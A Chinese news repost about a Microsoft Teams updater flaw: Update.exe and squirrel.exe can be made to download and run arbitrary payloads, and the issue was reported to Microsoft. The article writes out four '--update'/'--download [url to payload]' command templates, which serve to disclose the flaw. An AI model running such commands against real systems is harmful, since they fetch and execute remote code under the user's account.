雷锋网(公众号：雷锋网)消息，据 BleepingComputer 美国时间 6 月 29 日报道，多位安全研究人员发现当前在Microsoft Teams桌面应用中实现的“update”升级机制允许黑客在系统上下载和执行任意文件，

研究人员表示，对易受攻击的应用程序使用“update”命令可以在当前用户的上下文中执行任意二进制文件。目前，研究人员已向微软报告了这个问题。

使用Microsoft Teams，将有效负载添加到其文件夹中，并使用以下任一命令自动执行：

Update.exe --update [url to payload]

squirrel.exe --update [url to payload]

这些命令可以与其他参数一起使用，包括“download”，它允许从远程位置以NuGet包的形式检索有效负载。

Update.exe --download [url to payload]

squirrel.exe --download [url to payload]

相同的方法适用于“squirrel.exe”，它也是Microsoft Teams安装包的一部分。这两个可执行文件现在都是GitHub上的Living Off The Land Binaries and Scripts（LOLBAS）数据库的一部分。

安全研究员 Reegun Richard 在 6 月 4 日向微软团队报告了这个问题。此时，应用程序仍然容易受到攻击，因为微软通知研究员该修复程序将在未来的软件版本中出现。

来源：BleepingComputer 。

雷锋网版权文章，未经授权禁止转载。详情见转载须知。

扫二维码与项目经理沟通

我们在微信上24小时期待你的声音
解答本文疑问/网站优化/网站建设/seo技术/网站运营维护

　　「天工软件」是一家以提供小程序开发，APP开发，网站定制开发，数据服务，为主的专业公司。以客户需求为导向，客户利益为出发点，结合自身设计及专业建站优势，为客户提供从基础建设到营销推广的一整套解决方案，探索并实现客户商业价值较大化，为所有谋求长远发展的企业贡献全部力量。